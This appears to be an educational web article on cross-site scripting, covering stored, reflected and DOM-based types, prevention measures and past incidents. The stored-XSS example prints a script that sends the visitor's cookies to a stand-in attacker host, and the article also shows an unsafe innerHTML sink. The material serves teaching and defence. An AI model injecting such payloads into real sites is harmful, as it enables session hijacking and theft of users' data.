Cross-Site Scripting (XSS) is one of the most common and dangerous security vulnerabilities found in web applications. It allows attackers to inject malicious scripts into otherwise benign and trusted websites. When unsuspecting users visit these sites, the malicious scripts execute in their browsers, potentially compromising sensitive data or hijacking user sessions.
Table of Contents
What is XSS?
XSS is a client-side code injection attack. It enables attackers to execute malicious JavaScript (or other scripts) in another user’s browser. This is typically done by exploiting vulnerabilities in web applications that don’t properly validate or escape user input.
Why is XSS Dangerous?
- Session Hijacking: Stealing cookies to impersonate users.
- Credential Theft: Tricking users into submitting login details to a fake form.
- Defacement: Modifying page content for defamation or pranks.
- Phishing Attacks: Redirecting users to malicious sites.
- Spread Malware: Executing scripts to deliver viruses or trojans.
Types of XSS Attacks
Stored XSS (Persistent XSS)
- The malicious script is permanently stored on the target server (e.g., in a database, comment field, etc.).
- Every user who views the stored data gets exposed.
<script>fetch('https://attacker.com/steal?cookie=' + document.cookie)</script>Reflected XSS (Non-persistent XSS)
- The injected code is reflected off the web server (e.g., in a URL or query parameter).
- Requires social engineering (e.g., phishing link).
https://example.com/search?q=<script>alert('XSS')</script>DOM-based XSS
- The vulnerability exists in client-side JavaScript, not server-side.
- Occurs when the DOM is manipulated unsafely using user input.
document.getElementById('output').innerHTML = location.hash;If location.hash is #, the script will run.
How to Prevent XSS
- Escape User Input: Ensure that any user input displayed on a web page is properly escaped.
- Use Content Security Policy (CSP): CSP helps prevent XSS by restricting the sources from which scripts can be loaded.
- Validate and Sanitize Input: Use libraries like:
- PHP: htmlspecialchars(), htmlentities()
- Python/Flask: flask.escape()
- JavaScript: DOMPurify (for cleaning HTML)
- Avoid Inline JavaScript: Don’t use onclick, onload, or other inline handlers with untrusted data.
- Use Secure Frameworks: Modern frameworks like React, Angular, and Vue automatically escape outputs.
Real-World Examples
- MySpace Worm (2005): A user injected a self-propagating XSS worm that added them to other users’ friend lists and spread across the network in hours.
- British Airways (2018): XSS vulnerability was exploited to skim payment data of hundreds of thousands of users
Conclusion
XSS remains one of the top vulnerabilities in web security, as recognized by the OWASP Top 10. It’s essential for developers to understand how XSS works and follow secure coding practices to defend against it. A few simple measures — like escaping output, sanitizing inputs, and enforcing CSP — can dramatically reduce the risk of XSS attacks.